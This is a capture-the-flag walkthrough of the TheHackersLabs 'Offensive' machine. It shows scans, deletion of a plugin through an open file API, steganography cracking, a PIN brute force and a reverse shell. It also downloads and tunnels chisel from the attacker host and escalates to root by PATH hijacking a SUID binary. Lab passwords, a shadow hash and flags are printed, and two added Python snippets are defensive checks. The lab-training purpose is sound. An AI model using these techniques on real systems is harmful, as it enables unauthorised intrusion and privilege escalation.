TheHackersLabs-Offensive-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.170 08:00:27:87:39:6d (Unknown)
192.168.60.254 00:50:56:e0:65:b2 (Unknown)

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded
export ip=192.168.60.170
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.170:22
Open 192.168.60.170:80
Open 192.168.60.170:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 20:55 CST
Initiating ARP Ping Scan at 20:55
Scanning 192.168.60.170 [1 port]
Completed ARP Ping Scan at 20:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:55
Completed Parallel DNS resolution of 1 host. at 20:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:55
Scanning 192.168.60.170 [3 ports]
Discovered open port 80/tcp on 192.168.60.170
Discovered open port 8080/tcp on 192.168.60.170
Discovered open port 22/tcp on 192.168.60.170
Completed SYN Stealth Scan at 20:55, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.170
Host is up, received arp-response (0.00059s latency).
Scanned at 2025-02-01 20:55:42 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:87:39:6D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Edit the hosts file and add the domain name

sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.170 offensive.thl

Trump 🤣


A directory scan shows the site is built on WordPress

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.170
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.60.170/images/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.60.170/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.60.170/wp-includes/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.170/javascript/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.60.170/wp-admin/]
/makehomepage (Status: 301) [Size: 323] [--> http://192.168.60.170/makehomepage/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

wpscan plugin enumeration

So let's just run wpscan against it, aggressively scanning for all plugins at the same time

It enumerates one username, administrator, and a plugin called wps-hide-login

These plugins don't have any vulnerabilities either

❯ wpscan --url http://$ip -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.170/ [192.168.60.170]
[+] Started: Sat Feb 1 21:05:14 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.62 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.170/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.60.170/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.60.170/, Match: 'WordPress 6.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:58 <================================================================> (108890 / 108890) 100.00% Time: 00:00:58
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.60.170/wp-content/plugins/akismet/
| Latest Version: 5.3.5
| Last Updated: 2024-11-19T02:02:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.

[+] wps-hide-login
| Location: http://192.168.60.170/wp-content/plugins/wps-hide-login/
| Latest Version: 1.9.17.1 (up to date)
| Last Updated: 2024-10-09T09:23:00.000Z
| Readme: http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wps-hide-login/, status: 200
|
| Version: 1.9.17.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wps-hide-login/readme.txt

[+] wpterm
| Location: http://192.168.60.170/wp-content/plugins/wpterm/
| Latest Version: 1.1.9 (up to date)
| Last Updated: 2024-11-03T14:29:00.000Z
| Readme: http://192.168.60.170/wp-content/plugins/wpterm/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wpterm/, status: 200
|
| Version: 1.1.9 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wpterm/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.60.170/wp-content/plugins/wpterm/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] administrator
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb 1 21:06:19 2025
[+] Requests Done: 108914
[+] Cached Requests: 46
[+] Data Sent: 24.258 MB
[+] Data Received: 14.584 MB
[+] Memory used: 424.504 MB
[+] Elapsed time: 00:01:05

This plugin's main purpose is to hide the admin login URL

Apart from that there is no useful information

Foothold

So let's change direction: port 8080 hasn't been visited yet

curl it, and it returns Cannot GET /

❯ curl http://192.168.60.170:8080/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /</pre>
</body>
</html>

Scan the directories

❯ gobuster dir -u http://$ip:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.170:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/help (Status: 200) [Size: 203]
/cat (Status: 500) [Size: 31]
/ls (Status: 200) [Size: 176]
/rm (Status: 500) [Size: 45]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

There is a help endpoint, so let's look at the help text

Using ls I can see all the files in the current directory

It can also download, delete and so on

❯ curl http://192.168.60.170:8080/help
{"GET /ls":"ls?path= : List files.","GET /download/:filename":"Download file.","GET /cat":"cat?path= : Show file.","GET /rm":"rm?path= : Delete file.","GET /help":"Help.","Restrictions":"Only /var/www."}%
❯ curl http://192.168.60.170:8080/ls\?path\=wordpress
[{"name":"images","isDirectory":true,"size":4096,"modified":"2024-12-24T20:26:33.467Z"},{"name":"index.php","isDirectory":false,"size":405,"modified":"2020-02-06T06:33:11.000Z"},{"name":"makehomepage","isDirectory":true,"size":4096,"modified":"2024-12-22T23:16:37.578Z"},{"name":"wp-activate.php","isDirectory":false,"size":7387,"modified":"2024-02-13T14:19:09.000Z"},{"name":"wp-admin","isDirectory":true,"size":4096,"modified":"2024-11-21T15:00:03.000Z"},{"name":"wp-blog-header.php","isDirectory":false,"size":351,"modified":"2020-02-06T06:33:11.000Z"},{"name":"wp-comments-post.php","isDirectory":false,"size":2323,"modified":"2023-06-14T14:11:16.000Z"},{"name":"wp-config.php","isDirectory":false,"size":3320,"modified":"2024-12-20T12:01:45.475Z"},{"name":"wp-content","isDirectory":true,"size":4096,"modified":"2024-11-21T15:19:57.000Z"},{"name":"wp-cron.php","isDirectory":false,"size":5617,"modified":"2024-08-02T19:40:16.000Z"},{"name":"wp-includes","isDirectory":true,"size":12288,"modified":"2024-11-21T15:19:49.000Z"},{"name":"wp-links-opml.php","isDirectory":false,"size":2502,"modified":"2022-11-26T21:01:17.000Z"},{"name":"wp-load.php","isDirectory":false,"size":3937,"modified":"2024-03-11T10:05:15.000Z"},{"name":"wp-login.php","isDirectory":false,"size":51367,"modified":"2024-09-30T19:12:14.000Z"},{"name":"wp-mail.php","isDirectory":false,"size":8543,"modified":"2024-09-18T22:37:15.000Z"},{"name":"wp-settings.php","isDirectory":false,"size":29032,"modified":"2024-09-30T17:08:26.000Z"},{"name":"wp-signup.php","isDirectory":false,"size":34385,"modified":"2023-06-19T18:27:27.000Z"},{"name":"wp-trackback.php","isDirectory":false,"size":5102,"modified":"2024-10-18T15:56:18.000Z"}]%
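The help text says the file API restricts paths to /var/www. As an added example (not the lab's Node.js service, whose code is not shown), this is how such a restriction should be enforced: resolve the requested path against the root with symlinks followed and reject anything that escapes. The naive prefix test beside it shows why a string comparison is not enough. The root directory, sample tree and symlink are constructed in a temp dir.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional

# Assumed root, matching the "Restrictions: Only /var/www." line of the help output.
ALLOWED_ROOT = "/var/www"


def naive_check(root: str, requested: str) -> bool:
    """The weak form: a textual prefix test on the un-normalised path.
    It accepts '..' traversal, symlinks and sibling dirs such as /var/wwwroot."""
    return os.path.join(root, requested).startswith(root)


def resolve_within_root(root: str, requested: str) -> Optional[Path]:
    """Return the real path of `requested` inside `root`, or None if it escapes.

    Refuse absolute inputs (the API takes paths relative to the root), resolve
    root and candidate with symlinks followed, then require the candidate to be
    the root itself or one of its descendants.
    """
    if os.path.isabs(requested) or "\x00" in requested:
        return None
    real_root = Path(root).resolve()
    candidate = (real_root / requested).resolve()
    if candidate != real_root and real_root not in candidate.parents:
        return None
    return candidate


def demo() -> dict:
    """Build a constructed /var/www-like tree in a temp dir and run both checks.
    Returns {request: (naive_accepts, safe_accepts, should_accept)}."""
    tmp = Path(tempfile.mkdtemp())
    root = tmp / "www"
    (root / "wordpress" / "wp-content" / "plugins").mkdir(parents=True)
    (tmp / "secret.txt").write_text("outside the root")
    # A symlink inside the root that points outside it: textual checks cannot see this.
    (root / "wordpress" / "link").symlink_to(tmp / "secret.txt")
    (tmp / "wwwroot").mkdir()
    cases = {
        "wordpress/wp-content/plugins": True,
        "wordpress/../../secret.txt": False,
        "wordpress/link": False,
        "../wwwroot": False,
    }
    return {
        req: (naive_check(str(root), req), resolve_within_root(str(root), req) is not None, ok)
        for req, ok in cases.items()
    }
```

Containment alone would not have saved this box: an rm endpoint reachable without authentication can still delete anything under the root, as the plugin deletion below shows, so destructive operations need authentication regardless.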

Since the plugin that hides the admin login is installed, deleting it should restore the normal login page

❯ curl http://192.168.60.170:8080/ls\?path\=wordpress/wp-content/plugins
…… omitted ……{"name":"wps-hide-login","isDirectory":true,"size":4096,"modified":"2024-10-09T15:23:22.000Z"}………………

Just delete this folder

❯ curl http://192.168.60.170:8080/rm\?path\=wordpress/wp-content/plugins/wps-hide-login
{"message":"File or directory deleted successfully."}%

Now wp-admin is accessible


But I tried brute-forcing the password, with no result

Image steganography

I remembered that the earlier scan also found an images directory containing a picture


wget it; most likely the image hides information

Checking with steghide shows that it is passphrase-protected

Brute-force it with stegseek to get the password credential

❯ wget http://offensive.thl/images/wp-login.jpg
--2025-02-01 22:02:45-- http://offensive.thl/images/wp-login.jpg
Resolving offensive.thl (offensive.thl)... 192.168.60.170
Connecting to offensive.thl (offensive.thl)|192.168.60.170|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 648072 (633K) [image/jpeg]
Saving to: ‘wp-login.jpg’

wp-login.jpg 100%[=======================================================================>] 632.88K --.-KB/s in 0.01s

2025-02-01 22:02:45 (54.1 MB/s) - ‘wp-login.jpg’ saved [648072/648072]
❯ steghide extract -sf wp-login.jpg
Enter passphrase:
❯ stegseek -wl /usr/share/wordlists/rockyou.txt wp-login.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "bestfriend"
[i] Original filename: "wp-login.txt".
[i] Extracting to "wp-login.jpg.out".
cat wp-login.jpg.out
uFQ07kmjImx$)x9HHH3J3Sa5

After logging in, a shell can be obtained by uploading a malicious plugin

For details see TheHackersLabs-Debugsec-Walkthrough | Pepster's Blog


User privilege escalation

Listen on a port

There is a user maria

❯ pwncat-cs -lp 4444
[22:24:52] Welcome to pwncat 🐈! __main__.py:164
[22:25:07] received connection from 192.168.60.170:46744 bind.py:84
[22:25:08] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[22:25:24] 192.168.60.170:46744: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Offensive:/var/www/wordpress/wp-content$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
maria:x:1001:1001::/home/maria:/bin/bash

Look at the WordPress config file; it contains the database password

I tried connecting to it; well, nothing useful in there

(remote) www-data@TheHackersLabs-Offensive:/var/www/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'wpManoloPass' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );

/**#@-*/

/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:5000 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:8080 0.0.0.0:* users:(("node",pid=601,fd=18))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

chisel port forwarding

We can see port 5000 is open, but our scan couldn't reach it, so use Chisel to forward the port

(remote) www-data@TheHackersLabs-Offensive:/$ cd /tmp/
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ls
(remote) www-data@TheHackersLabs-Offensive:/tmp$ wget 192.168.60.100/chisel
--2025-02-01 08:42:49-- http://192.168.60.100/chisel
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: 'chisel'

chisel 100%[=======================================================================>] 8.94M 51.5MB/s in 0.2s

2025-02-01 08:42:49 (51.5 MB/s) - 'chisel' saved [9371800/9371800]

(remote) www-data@TheHackersLabs-Offensive:/tmp$ chmod +x chisel
(remote) www-data@TheHackersLabs-Offensive:/tmp$ ./chisel client 192.168.60.100:1234 R:5000:127.0.0.1:5000
2025/02/01 08:45:29 client: Connecting to ws://192.168.60.100:1234
2025/02/01 08:45:29 client: Connected (Latency 864.092µs)
------------ separator (attacker side) -----------------------
❯ ./chisel server --reverse -p 1234
2025/02/01 22:44:28 server: Reverse tunnelling enabled
2025/02/01 22:44:28 server: Fingerprint 7ay8QFKpcKJoy7bqG4yeHn4OUpW6WbSzjRpB4zK05EA=
2025/02/01 22:44:28 server: Listening on http://0.0.0.0:1234
2025/02/01 22:45:28 server: session#1: tun: proxy#R:5000=>5000: Listening

Now when you visit port 5000, you'll find a user credential is already pre-filled as soon as you land on the page

But a PIN is required; fortunately it is only four digits


Just brute-force it; fire up Burp Suite

No idea why the Intruder module is so slow at this

wfuzz brute force

I'll use wfuzz instead

PIN 3333 gives a 302 redirect

seq 1000 9999 >pass
❯ wfuzz -c -u "http://127.0.0.1:5000/" -d "usuario=admin&password=disconnected&pin=FUZZ" -w pass --hw 283
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://127.0.0.1:5000/
Total requests: 9000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000002334: 302 0 L 0 W 0 Ch "3333"

Total time: 26.28226
Processed Requests: 9000
Filtered Requests: 8999
Requests/sec.: 342.4362

Once inside, it seems commands can be executed


Send a shell back with nc; listen on a port

❯ pwncat-cs -lp 4444
[23:02:48] Welcome to pwncat 🐈! __main__.py:164
[23:02:49] received connection from 192.168.60.170:35768 bind.py:84
[23:02:49] 0.0.0.0:4444: normalizing shell path manager.py:957
[23:03:05] 192.168.60.170:35768: registered new host w/ db manager.py:957
(local) pwncat$
(remote) maria@TheHackersLabs-Offensive:/home/maria$ cat user.txt
dfashsd6bh7afd859bd6fab5dsb0
(remote) maria@TheHackersLabs-Offensive:/home/maria$ ls
app backup.txt GyMG.jpg index.php logout.php user.txt welcome.php

Root privilege escalation

The home directory contains an executable, app, with the SUID bit set

Running it shows the first 8 lines of shadow, but why does it run twice?

(remote) maria@TheHackersLabs-Offensive:/home/maria$ ./app


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::

Let's see what commands the program calls

(remote) maria@TheHackersLabs-Offensive:/home/maria$ strings app |grep head
/usr/bin/head -n 8 /etc/shadow
head -n 8 /etc/shadow
z

It uses head to read shadow

How to escalate with this? Command hijacking most likely won't work, because the program specifies an absolute path

I tried defining an alias, with no result

Wait, that's not right: the second head command doesn't specify a path

Environment variable hijacking

So environment variable hijacking is possible

Let's try it

(remote) maria@TheHackersLabs-Offensive:/home/maria$ echo "bash -p">head
(remote) maria@TheHackersLabs-Offensive:/home/maria$ chmod +x head
(remote) maria@TheHackersLabs-Offensive:/home/maria$ export PATH=/home/maria:$PATH
(remote) maria@TheHackersLabs-Offensive:/home/maria$ echo $PATH
/home/maria:/usr/bin:/usr/sbin:/bin:/sbin:/usr/local/bin:/usr/local/sbin
(remote) maria@TheHackersLabs-Offensive:/home/maria$ ./app


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root:$y$j9T$2mXNTjVfEEjRt6t2uVu7k0$RBnftcaGot4JsJ8DHVuo0LkG8UuuKR68CdazrjK2Rf8:20088:0:99999:7:::
daemon:*:20066:0:99999:7:::
bin:*:20066:0:99999:7:::
sys:*:20066:0:99999:7:::
sync:*:20066:0:99999:7:::
games:*:20066:0:99999:7:::
man:*:20066:0:99999:7:::
lp:*:20066:0:99999:7:::


[*] Mostrando las primeras 8 líneas del archivo /etc/shadow

root@TheHackersLabs-Offensive:~# id
uid=0(root) gid=1001(maria) grupos=1001(maria)
root@TheHackersLabs-Offensive:~# cat /root/root.txt
asfsdg54asf978bsadb54d9afb785db48
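As an added defender-side check (not part of the walkthrough), the script below turns the `strings app | grep head` reasoning into an audit: it extracts printable strings from a binary and flags embedded command lines whose program is a bare name, which is exactly the `head -n 8 /etc/shadow` pattern that made the PATH hijack possible. The stand-in binary is constructed in a temp file; the string and command-line heuristics and their thresholds are assumptions.

```python
import os
import re
import stat
import tempfile
from typing import List

# Printable ASCII runs of at least 4 bytes, like the default of strings(1).
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# A command line whose program is a bare name (no slash) followed by at least
# one argument that looks like an option or a path. Heuristic, assumed here.
_BARE_CMD = re.compile(r"^([A-Za-z][\w.-]*)\s+(?:\S+\s+)*(?:-\S+|/\S+)")


def extract_strings(data: bytes) -> List[str]:
    """Minimal strings(1): decode every run of printable ASCII."""
    return [m.group().decode("ascii") for m in _PRINTABLE.finditer(data)]


def relative_commands(strings: List[str]) -> List[str]:
    """Return embedded command lines that would be resolved via PATH lookup."""
    return [s for s in strings if _BARE_CMD.match(s)]


def has_setuid_bit(path: str) -> bool:
    """True if the SUID bit is set; on a real system also check st_uid == 0."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def audit(path: str) -> dict:
    """Combine both signals: a SUID binary with bare command names is the finding."""
    with open(path, "rb") as fh:
        strs = extract_strings(fh.read())
    return {"setuid": has_setuid_bit(path), "relative_commands": relative_commands(strs)}


def demo() -> dict:
    """Constructed stand-in for the lab's ./app: one absolute and one bare head
    invocation, mirroring the strings output shown above."""
    fd, path = tempfile.mkstemp(prefix="app-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(b"\x7fELF\x00\x00/usr/bin/head -n 8 /etc/shadow\x00"
                 b"head -n 8 /etc/shadow\x00z\x00")
    os.chmod(path, 0o4755)  # setting SUID on a file you own needs no root
    try:
        return audit(path)
    finally:
        os.unlink(path)
```

On the binary side the fix is to invoke /usr/bin/head by absolute path for both calls, or to set a fixed PATH and clear the inherited environment before any system()-style call in a SUID program.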
